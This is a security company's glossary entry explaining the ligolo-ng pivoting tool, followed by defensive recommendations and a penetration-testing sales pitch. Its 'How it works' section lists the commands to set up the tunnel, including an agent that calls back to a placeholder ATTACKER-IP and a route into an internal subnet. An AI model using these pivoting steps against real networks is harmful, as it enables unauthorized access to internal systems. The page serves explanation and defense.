Lateral Movement · Term

What is ligolo-ng?

ligolo-ng is a modern pivoting tool that gives the attacker a virtual network interface, making an internal subnet reachable as if it were directly connected. No proxychains needed. Here is what it does.

Lateral Movement · TermAll services
TL;DR

ligolo-ng is an open-source pivoting tool that exposes a compromised network through a virtual TUN interface on the attacker’s machine. Instead of per-port forwards or wrapping every tool in proxychains, the attacker adds a route to the internal subnet and reaches it natively, as if directly connected. It runs an agent on the pivot and a proxy on the attacker side. Its ease and full-subnet access have made it a common modern alternative to SSH and chisel for pivoting.

By John Dill, Red Team Lead, SecureLayer7Updated

What ligolo-ng is

Most pivoting forwards one port at a time or routes tools through a SOCKS proxy. ligolo-ng takes a different approach: it creates a virtual network interface (TUN) on the attacker’s machine and routes traffic for the internal subnet through the pivot.

The result is that the attacker’s tools talk to internal IPs directly, with no proxychains and no per-port setup, because the operating system simply routes that subnet over the tunnel. It uses an agent (on the pivot) and a proxy/listener (on the attacker side).

How it works and payload

The typical flow:

  • Attacker starts the proxy and creates the tunnel interface: ligolo-ng proxy -selfcert then bring up the ligolo interface.
  • Run the agent on the pivot, calling back: agent -connect ATTACKER-IP:11601
  • In the proxy console, start the tunnel and add a route to the internal subnet: tunnel_start, then ip route add 10.10.0.0/24 dev ligolo.
  • The attacker now reaches 10.10.0.0/24 directly with any tool, no proxychains.

Documented techniques shown for defenders.

How to defend

  • Restrict egress so the pivot agent cannot call back to an external proxy.
  • Segment so even a routed subnet exposes as little as possible.
  • Monitor for the agent’s outbound connection and for one internal host originating traffic to many others.
  • Use application allow-listing to stop a dropped agent binary from running.
  • Inspect outbound traffic and unusual long-lived connections at egress points.

References

  1. [1]MITRE ATT&CK: Lateral Movement (TA0008)(MITRE)
  2. [2]NIST SP 800-115 Technical Guide to Security Testing(NIST)
  3. [3]Linux man-pages: ssh(1)(man7.org)
Related terms

Common questions

Lateral movement, asked often

Want your network tested for these paths?

Scope an engagement

Find the lateral-movement paths before an attacker does.

We run internal and network penetration tests that follow the real route from one compromised host across your network, then hand your team a report with reproducible evidence and a fix for every step. Free re-test included.

See all services30-min scoping call, fixed-price proposal in 48 hours.